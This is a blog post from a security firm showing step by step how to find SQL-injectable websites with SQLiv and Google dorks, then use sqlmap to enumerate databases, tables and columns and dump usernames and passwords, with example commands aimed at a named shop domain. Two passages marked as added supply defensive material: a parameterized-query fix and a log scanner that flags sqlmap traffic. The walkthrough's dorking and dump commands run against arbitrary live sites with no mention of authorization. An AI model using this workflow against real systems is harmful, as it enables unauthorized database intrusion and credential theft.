The number of people who use databases for data storage and management in web app development keeps growing as time moves on. The database facilitates communication between users and servers. It offers several benefits, including data input and storage, retrieval of large amounts of information, and ease of grouping information.
This is both exciting and worrying, because a database holds a lot of important details such as account credentials, financial details and so on. Also, carrying out SQL injection attacks does not always require expert injection skills; in that sense, even kids can do it, because there are many applications that perform SQL injection automatically, such as SQLMap. SQLMap is a penetration-testing application that automates SQL injection attacks against databases. In this blog, we will show you how to do SQL injection using SQLMap. No special requirements are needed, but it will be worth more if you have mastered a scripting language. This blog is suggested for those who are new to SQL injection, or who want to see how SQL injection works.
What Is SQL Injection?
SQL injection, commonly referred to as SQLi, is perhaps one of the most common attack methods. It uses malicious code to manipulate the back-end database and access details that weren't intended to be displayed and are meant to be kept highly secret.
How does SQL injection work?
To run a SQL injection, an attacker must locate a vulnerable input in a web application or web page. When an application or web page has an SQL injection vulnerability, it uses user input directly in an SQL query. The attacker can then supply a specially built SQL command as that input. Leveraging this, the attacker can obtain responses that reveal the structure of the database and thereby gain access to all the information in it.
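The flaw described above next to its fix, as an added example that is not part of the original post. It mirrors the item.php?id= lookup used later on this page, in Python against an in-memory SQLite database; the table contents and function names are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data standing in for a shop database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO items VALUES (25, 'oak table'), (26, 'pine chair');
        CREATE TABLE settings (username TEXT, password TEXT);
        INSERT INTO settings VALUES ('admin', 'constructed-hash');
    """)
    return db


def get_item_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    query = "SELECT id, name FROM items WHERE id = " + raw_id
    return db.execute(query).fetchall()


def get_item_safe(db, raw_id):
    # 1. Validate: this parameter is only ever a short decimal integer.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    # 2. Bind: the value travels as data and cannot alter the query shape.
    return db.execute(
        "SELECT id, name FROM items WHERE id = ?", (int(raw_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("25", "25 OR 1=1",
                  "0 UNION SELECT username, password FROM settings"):
        print("input:", repr(value))
        print("  vulnerable ->", get_item_vulnerable(db, value))
        try:
            print("  safe       ->", get_item_safe(db, value))
        except ValueError as exc:
            print("  safe       -> rejected:", exc)
```

With the concatenated query, the second and third inputs return rows the page was never meant to show; the bound version rejects both before any SQL runs.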
How do we do SQL injection using SQLmap in Kali Linux?
- The first step is to install SQLiv on Kali Linux
- The next step is finding SQL injection vulnerabilities
- The last and final step is SQL injection using SQLMap
How to install SQLiv on Kali Linux?
Type the following commands into your terminal to install SQLiv:
~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i
After SQLiv is installed on your Kali Linux, it is kept in the path /usr/bin/sqliv, so you can call it from the terminal by typing ‘sqliv’.
How do we find SQL injection vulnerabilities?
We will always use Google Dorking to scan for and identify SQL injection in targets. Let’s take a simple dork and let SQLiv scan through each target, looking for an eCommerce vulnerability at the following URL pattern: ‘item.php?id=’. To find other patterns, just google for “google dork list”.
~# sqliv -d inurl:item.php?id= -e google -p 100
By default, SQLiv will crawl the first page of a search. Thus, here we define the argument -p 100 to crawl through 100 sites.
How do we do SQL injection using SQLmap?
Once we have at least one point that is vulnerable to SQL injection, we next run the attack using SQLMap. First, we need to reveal the database name; the database has tables and columns, and those contain the data. Steps to follow:
- The first step is to enumerate the database names
- The next step is to enumerate the table names
- The third step is to enumerate the columns
- The last step is to dump the data
How to enumerate the database names:
Command pattern:
~# sqlmap -u "TARGET URL" --dbs
-u / --url : Target URL
--dbs : Enumerate Database/s name
So, for example, the command would look like this:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" --dbs
How to enumerate table names:
Command pattern:
~# sqlmap -u "TARGET URL" -D database-name --tables
So, for example, the command would look like this:
~# sqlmap -u " the link that you try to inject" -D acfurniture --tables
How to enumerate column names:
Command pattern:
~# sqlmap -u "TARGET URL" -D database-name -T table-name --columns
So, for example, the command would look like this:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --columns
How do we dump data?
Command pattern:
~# sqlmap -u "TARGET URL" -D database-name -T table-name -C columns --dump
So, for example, the command would look like this:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump
Or you can also dump all the data inside the table by leaving out the -C option. The command below is only an example; instead of the given URL, use the URL you want to test for SQL injection:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump
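From the defender's side, the id parameter targeted above should only ever carry an integer, so any request where it does not is worth an alert. The following is an added example, not part of the original post: it scans constructed access-log lines (combined log format, documentation IP ranges) for non-numeric id values and for the User-Agent that sqlmap sends by default. The log lines and function name are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines; not taken from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=25 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /item.php?id=25%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /item.php?id=25%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)


def findings(log_text, param="id"):
    """Return (client_ip, request_target, reasons) for suspicious requests."""
    results = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip it
        ip, _method, target, _status, user_agent = match.groups()
        reasons = []
        # Default tool banner. The header is client-controlled, so treat it
        # as a convenience signal only, never as the sole detection.
        if "sqlmap" in user_agent.lower():
            reasons.append("sqlmap user-agent")
        # parse_qs percent-decodes values, so encoded payloads are seen
        # in the same form the application would receive them.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not re.fullmatch(r"[0-9]+", value):
                reasons.append("non-numeric " + param)
        if reasons:
            results.append((ip, target, reasons))
    return results


if __name__ == "__main__":
    for ip, target, reasons in findings(SAMPLE_LOG):
        print(ip, target, ", ".join(reasons))
```

The same integer check belongs in the application itself as input validation, alongside parameterized queries.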
If you have any queries about the above topic, or need services and consultations against this serious cyber threat, feel free to contact us. AIRZERO SEC will be your strong cyber partner.
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/